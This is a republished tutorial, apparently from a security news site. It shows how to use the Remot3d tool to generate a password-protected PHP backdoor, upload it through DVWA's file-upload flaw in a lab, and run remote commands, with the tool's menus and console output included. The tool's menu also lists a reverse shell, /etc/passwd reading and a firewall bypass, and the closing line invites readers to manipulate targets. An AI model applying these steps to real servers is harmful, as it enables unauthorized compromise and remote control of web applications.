Build your own PHP Remote Backdoor

Backdoor is an malware which is used to break authentication of any computer system. Now day’s most of the backdoor attacks are increasing in organizations. Backdoor takes hidden form of the program. Backdoor can be designed & programmed easily, as it was demonstrated in ethical hacking course of International Institute of Cyber Security, Delhi India. Today we will shows you a simple program which is used in creating backdoor easily.

Remot3d tool is used in creating backdoor. It’s a few lines of code which is used to attack php web applications.

ATTACKER :-

Remot3d Installation :-

@@@@@@@ @@@@@@@@ @@@@@@@@@@ @@@@@@ @@@@@@@ @@@@@@ @@@@@@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@@ @@@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@@ @@! @@@ @@! @@! @@! @@! @@! @@@ @@! @@@ @@! @@@ !@! @!@ !@! !@! !@! !@! !@! @!@ !@! @!@ !@! @!@ @!@!!@! @!!!:! @!! !!@ @!@ @!@ !@! @!! @!@!!@ @!@ !@! !!@!@! !!!!!: !@! ! !@! !@! !!! !!! !!@!@! !@! !!! !!: :!! !!: !!: !!: !!: !!! !!: !!: !!: !!! :!: !:! :!: :!: :!: :!: !:! :!: :!: :!: !:! :: ::: :: :::: ::: :: ::::: :: :: :: :::: :::: :: : : : : :: :: : : : : : : : : : :: : : -------------------------------------- PHP REMOTE BACKDOOR - BY B1P0L4R[+] Options : 
└[-] 1. Generate Backdoor
└[-] 2. Generate Reverser Shell (with iMap Disable Function Bypass)
└[-] 3. Bypass Read /etc/passwd (with unique logic)
└[-] 4. Remote your Backdoor (Just for Option 1)
┌[+] Choose the options
└[root@indoxploit]:#
  • Above are the options which are used in creating backdoors.
  • Type 1
┌[+] Choose the options └[root@indoxploit]:~# 1__----_ /##| \ /###| | \______ |####| \ |####| ___ ___|© \####/ _____ / \### / =====ÊšçØ ╔═╗┬ ┬┌─┐ ╦═╗┌─┐┌┬┐┌─┐┌┬┐┌─┐ // / \ ╠═╝├─┤├─┘ ╠╦╝├┤ ││││ │ │ ├┤ // | |_ \ ╩ ┴ ┴┴ ╩╚═└─┘┴ ┴└─┘ ┴ └─┘ // But it's useless ! \___/ | ╔╗ ╔═╗╔═╗╦╔═╔╦╗╔═╗╔═╗╦═╗ // you can't control his heart \ / ╠╩╗╠═╣║ ╠╩╗ ║║║ ║║ ║╠╦╝ // | |__|__ ╚═╝╩ ╩╚═╝╩ ╩═╩╝╚═╝╚═╝╩╚═ // (______)___) Version 2.0 - Stable[+] Set Your Backdoor Name : backdoor.pbp
  • Then type backdoor name backdoor.php
  • Then enter the password : 123456
[+] Set Your Backdoor Password : 123456 
└[-] Success Generating Backdoor on /home/user/Downloads/Remot3d/backdoor.pbp
  • Backdoor will save in current directory of Remot3d.
  • Now this backdoor.php is required to uploaded to vulnerable server, which in our case is DVWA. We will use upload vulnerability in DVWA to upload this backdoor.php
  • For testing upload backdoor in DVWA. Go to browser and open dvwa. Type 192.168.1.105. Enter username : admin & password : password
  • After opening DVWA, click on Upload. Then go to Remot3d location & select the backdoor.php file.
  • After uploading the file. Go to terminal type ./Remot3d
  • Type 4
[+] Options : 
└[•] 1. Generate Remote Backdoor
└[•] 2. Generate Reverser Shell (with iMap Disable Function Bypass)
└[•] 3. Bypass Server Firewall (with FUD Backdoor Script)
└[•] 4. Remote your Backdoor (Just for Option 1)
┌[+] Choose the options└[root@indoxploit]:~# 4
[ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ] [!] Backdoor Alive… Processing for Connect [+] Your Public IP : 47.5.27.25 [+] System Info :Notice: Undefined index: pwd in /opt/lampp/htdocs/hackable/uploads/backdoor3.php on line 1Linux dvwa #41-Ubuntu SMP Thu Aug 19 01:12:52 UTC 2010 i686 unknown GNU/Linux [+] User ID :Notice: Undefined index: pwd in /opt/lampp/htdocs/hackable/uploads/backdoor3.php on line 1uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)[ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ][+] COMMAND : ifconfigNotice: Undefined index: pwd in /opt/lampp/htdocs/hackable/uploads/backdoor3.php on line 1eth0 Link encap:Ethernet HWaddr 00:0c:29:33:5d:c2 inet addr:192.168.1.105 Bcast:192.168.1.255 Mask:255.255.255.0 inet6 addr: fe80::20c:29ff:fe33:5dc2/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:1035 errors:0 dropped:0 overruns:0 frame:0 TX packets:383 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:106710 (106.7 KB) TX bytes:267977 (267.9 KB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:68 errors:0 dropped:0 overruns:0 frame:0 TX packets:68 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0RX bytes:5440 (5.4 KB) TX bytes:5440 (5.4 KB)
  • Type ls will display current files in server.
[+] COMMAND : lsNotice: Undefined index: pwd in /opt/lampp/htdocs/hackable/uploads/backdoor3.php on line 1backdoor backdoor2 backdoor3.php backdoor4.php dvwa_email.pngtest
  • Now you can manipulate your target. If target is having above vulnerability.

Originally published at www.securitynewspaper.com on March 26, 2019.

Knowledge belongs to the world